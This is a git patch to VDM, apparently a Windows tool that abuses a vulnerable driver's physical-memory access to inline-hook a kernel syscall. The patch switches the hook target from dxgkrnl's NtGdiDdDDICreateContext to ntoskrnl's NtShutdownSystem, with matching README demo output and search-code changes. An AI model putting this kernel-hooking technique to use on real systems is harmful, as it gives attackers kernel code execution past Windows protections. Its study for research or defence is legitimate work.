From dcfadd1359187ce0a1425dbf761237d04286e549 Mon Sep 17 00:00:00 2001 From: xerox Date: Thu, 5 Nov 2020 20:28:22 -0800 Subject: [PATCH] switched back to use NtShutdownSystem --- README.md | 13 +++++++------ VDM/main.cpp | 1 + VDM/vdm_ctx/vdm_ctx.cpp | 12 +++++++----- VDM/vdm_ctx/vdm_ctx.h | 4 ++-- 4 files changed, 17 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index 9b75480..4775ed0 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ whereas this project is. This project can be used more broadly then physmeme. # Example -In this example VDM syscalls into an inline hook placed on `dxgkrnl.NtGdiDdDDICreateContext` to call memcpy exported from ntoskrnl.exe. +In this example VDM syscalls into an inline hook placed on `ntoskrnl.NtShutdownSystem` to call memcpy exported from ntoskrnl.exe. #### Demo Code ```cpp @@ -44,10 +44,11 @@ std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes); #### Demo Code Result ``` -[+] drv_handle -> 0xb0, drv_key -> frAQBc8Wsa1xVPfv -[+] NtGdiDdDDICreateContext physical address -> 0x0000000100ACA5F0 -[+] ntoskrnl base address -> 0xFFFFF80075200000 -[+] ntoskrnl memcpy address -> 0xFFFFF800755F0980 +[+] drv_handle -> 0x100, drv_key -> frAQBc8Wsa1xVPfv +[+] NtShutdownSystem physical address -> 0x0000000002D0B1A0 +[+] NtShutdownSystem page offset -> 0x1a0 +[+] ntoskrnl base address -> 0xFFFFF80456400000 +[+] ntoskrnl memcpy address -> 0xFFFFF804565D5A80 [+] kernel MZ -> 0x5a4d [+] press any key to close... ``` @@ -59,7 +60,7 @@ hook by changing this variable inside of `vdm_ctx/vdm_ctx.h`. ```cpp // change this to whatever you want :^) -constexpr std::pair syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" }; +constexpr std::pair syscall_hook = { "NtShutdownSystem`", "ntdll.dll" }; ``` ### vdm::load_drv diff --git a/VDM/main.cpp b/VDM/main.cpp index fe6427d..058e2be 100644 --- a/VDM/main.cpp +++ b/VDM/main.cpp @@ -19,6 +19,7 @@ int __cdecl main(int argc, char** argv) std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str()); std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load()); + std::printf("[+] %s page offset -> 0x%x\n", vdm::syscall_hook.first, vdm::nt_page_offset); std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base); std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy); diff --git a/VDM/vdm_ctx/vdm_ctx.cpp b/VDM/vdm_ctx/vdm_ctx.cpp index 8b16ab4..7499fb4 100644 --- a/VDM/vdm_ctx/vdm_ctx.cpp +++ b/VDM/vdm_ctx/vdm_ctx.cpp @@ -4,14 +4,13 @@ namespace vdm { vdm_ctx::vdm_ctx() { - LoadLibraryA("user32.dll"); // required for win32u.dll... - vdm::dxgkrnl_buffer = reinterpret_cast( - LoadLibraryEx("drivers\\dxgkrnl.sys", NULL, + vdm::ntoskrnl = reinterpret_cast( + LoadLibraryExA("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES)); nt_rva = reinterpret_cast( util::get_kernel_export( - "dxgkrnl.sys", + "ntoskrnl.exe", syscall_hook.first, true )); @@ -47,11 +46,14 @@ namespace vdm break; if (!vdm::read_phys(reinterpret_cast(address + page), page_data, PAGE_4KB)) + { + std::printf("[+] failed to read phys...\n"); continue; + } // check the first 32 bytes of the syscall, if its the same, test that its the correct // occurrence of these bytes (since dxgkrnl is loaded into physical memory at least 2 times now)... - if (!memcmp(page_data + nt_page_offset, dxgkrnl_buffer + nt_rva, 32)) + if (!memcmp(page_data + nt_page_offset, ntoskrnl + nt_rva, 32)) if (valid_syscall(reinterpret_cast(address + page + nt_page_offset))) syscall_address.store( reinterpret_cast( diff --git a/VDM/vdm_ctx/vdm_ctx.h b/VDM/vdm_ctx/vdm_ctx.h index 9ff67e3..6401048 100644 --- a/VDM/vdm_ctx/vdm_ctx.h +++ b/VDM/vdm_ctx/vdm_ctx.h @@ -11,14 +11,14 @@ namespace vdm { // change this to whatever you want :^) - constexpr std::pair syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" }; + constexpr std::pair syscall_hook = { "NtShutdownSystem", "ntdll.dll" }; inline std::atomic is_page_found = false; inline std::atomic syscall_address = nullptr; inline std::uint16_t nt_page_offset; inline std::uint32_t nt_rva; - inline std::uint8_t* dxgkrnl_buffer; + inline std::uint8_t* ntoskrnl; class vdm_ctx {